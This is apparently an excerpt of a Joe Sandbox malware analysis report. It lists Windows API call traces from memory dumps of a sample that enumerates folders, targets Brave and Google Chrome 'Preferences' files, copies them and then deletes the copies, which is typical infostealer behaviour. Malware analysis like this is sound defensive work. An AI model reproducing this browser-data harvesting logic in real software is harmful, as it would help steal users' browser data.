                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401AAC
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00401B45
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 00401B70
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00401B8A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401C03
                          • lstrlen.KERNEL32(00431794), ref: 00401C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401C31
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401C74
                          • lstrlen.KERNEL32(00431794), ref: 00401C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401CA2
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401CAE
                          • lstrlen.KERNEL32(?), ref: 00401CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401CE9
                          • lstrlen.KERNEL32(00431794), ref: 00401CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401D14
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401DEB
                          • lstrlen.KERNEL32(00431794), ref: 00401DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E19
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401E56
                          • lstrlen.KERNEL32(00431794), ref: 00401E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401E81
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401E8D
                          • lstrlen.KERNEL32(?), ref: 00401E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00401EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00401F45
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401F9F
                          • lstrlen.KERNEL32(00FB8B30), ref: 00401FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401FE3
                          • lstrlen.KERNEL32(00431794), ref: 00401FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040200E
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00402042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040204D
                          • lstrlen.KERNEL32(00431794), ref: 00402058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402075
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: b47ce8a7f0e21845c30875caa1eccb5d7b5f46704766099070902513762b18b6
                          • Instruction ID: 460b8ac86f72d25f6e5ebb92b52d643007554856965cf67df0604cdf190c526c
                          • Opcode Fuzzy Hash: b47ce8a7f0e21845c30875caa1eccb5d7b5f46704766099070902513762b18b6
                          • Instruction Fuzzy Hash: 41928571A112169BCB21AF65DE88AAF77B9AF44304F04503AF805B72E1DB78DD05CFA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DBEF
                          • lstrlen.KERNEL32(00434CA8), ref: 0040DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC17
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 0040DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC4C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DC8F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0040DCD0
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0040DCF0
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0040DD0A
                          • lstrlen.KERNEL32(0042CFEC), ref: 0040DD1D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DD7B
                          • lstrlen.KERNEL32(00431794), ref: 0040DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDA3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DDAF
                          • lstrlen.KERNEL32(?), ref: 0040DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0040DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DE19
                          • lstrlen.KERNEL32(00431794), ref: 0040DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DE6F
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DE7B
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DEBB
                          • lstrlen.KERNEL32(00431794), ref: 0040DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DEE6
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DEF2
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFA5
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DFB1
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DFF4
                          • lstrlen.KERNEL32(00431794), ref: 0040DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E022
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040E02E
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0040E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040E0E7
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E11F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0040E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E19F
                          • lstrcat.KERNEL32(00000000), ref: 0040E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E1F9
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E22F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E261
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 0040E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0040E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0040E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E349
                          • DeleteFileA.KERNEL32(?), ref: 0040E381
                          • StrCmpCA.SHLWAPI(?,00FBCFF8), ref: 0040E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E445
                          • StrCmpCA.SHLWAPI(?,00FB8A50), ref: 0040E468
                          • StrCmpCA.SHLWAPI(?,00FB89D0), ref: 0040E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0040E4E0
                          • StrCmpCA.SHLWAPI(?,00FBD010), ref: 0040E58E
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040E776
                          • DeleteFileA.KERNEL32(?), ref: 0040E7D2
                          • StrCmpCA.SHLWAPI(?,00FB8B50), ref: 0040E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: ea8ecec36efb8dcf8ca34e78b9b59c1b310bf7821d49f84b04cc982f308f5e86
                          • Instruction ID: 89082decf07d413865bd714b95cad300059a3b837d100de99a3d830dabc279d1
                          • Opcode Fuzzy Hash: ea8ecec36efb8dcf8ca34e78b9b59c1b310bf7821d49f84b04cc982f308f5e86
                          • Instruction Fuzzy Hash: 0C927D71A102069BCB20AFB9DD89AAF77B9AF44304F04553AF805B72D1DB78DC458FA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004118D2
                          • lstrlen.KERNEL32(\*.*), ref: 004118DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 004118FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0041190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00411947
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 00411967
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411981
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004119BF
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004119F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411A4C
                          • lstrlen.KERNEL32(00431794), ref: 00411A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411A80
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411AB4
                          • lstrlen.KERNEL32(?), ref: 00411AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00411AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B19
                          • lstrlen.KERNEL32(00FB8A10), ref: 00411B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B8F
                          • lstrlen.KERNEL32(00431794), ref: 00411BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411BC3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C57
                          • lstrlen.KERNEL32(00431794), ref: 00411C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C8B
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D21
                          • lstrlen.KERNEL32(00431794), ref: 00411D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D55
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411DED
                          • lstrlen.KERNEL32(00431794), ref: 00411E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411E36
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411E68
                          • lstrlen.KERNEL32(00FBCF50), ref: 00411E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411EB2
                          • lstrlen.KERNEL32(00431794), ref: 00411EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411EE3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F15
                          • lstrlen.KERNEL32(00FBD728), ref: 00411F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F5F
                          • lstrlen.KERNEL32(00431794), ref: 00411F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F90
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411FC2
                          • lstrlen.KERNEL32(00FAB310), ref: 00411FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412036
                          • lstrlen.KERNEL32(00431794), ref: 00412048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412067
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00412073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412098
                          • lstrlen.KERNEL32(?), ref: 004120AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004120D0
                          • lstrcat.KERNEL32(00000000,?), ref: 004120DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412103
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041213F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0041214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 4ce771d22f91469fb80aa1fc91939a485c3ea60ca114c77d5d502a966bb14593
                          • Instruction ID: 9cc103bb8bd8c0fc6ef5c51ef965a1b5fb9a92b33cadedd001fd5aa1bfe9e977
                          • Opcode Fuzzy Hash: 4ce771d22f91469fb80aa1fc91939a485c3ea60ca114c77d5d502a966bb14593
                          • Instruction Fuzzy Hash: 3162B7306116169BCB21AF75DD48AEF77BAAF44704F04012AF905E32A0DBBCDD45CBA8
                          APIs
                          • wsprintfA.USER32 ref: 0041392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00413943
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041396C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00413986
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004139BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004139E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004139F2
                          • lstrlen.KERNEL32(00431794), ref: 004139FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A1A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413A26
                          • lstrlen.KERNEL32(?), ref: 00413A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00413A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A8A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00413ACE
                          • lstrlen.KERNEL32(?), ref: 00413AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B36
                          • lstrlen.KERNEL32(00431794), ref: 00413B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B6A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B9E
                          • lstrlen.KERNEL32(?), ref: 00413BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00413BE0
                          • lstrlen.KERNEL32(00FB8B30), ref: 00413C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413C3C
                          • lstrlen.KERNEL32(00FB8A10), ref: 00413C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413CB7
                          • lstrlen.KERNEL32(00431794), ref: 00413CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413CE8
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413D79
                          • lstrlen.KERNEL32(00431794), ref: 00413D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413DAD
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E43
                          • lstrlen.KERNEL32(00431794), ref: 00413E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E77
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F0D
                          • lstrlen.KERNEL32(00431794), ref: 00413F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F41
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F75
                          • lstrlen.KERNEL32(?), ref: 00413F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00413FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413FE0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041401F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0041402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004140CE
                          • lstrcat.KERNEL32(00000000), ref: 004140DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 004142D9
                          • FindClose.KERNEL32(00000000), ref: 004142E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 8ca520b053c92cd98528fe744200d4efe85e3513570d007cb1c607061484f78c
                          • Instruction ID: 165d9e09db27d37c9d1f329b21ddaa26429c0bab99b0da1754f27d60a1fad692
                          • Opcode Fuzzy Hash: 8ca520b053c92cd98528fe744200d4efe85e3513570d007cb1c607061484f78c
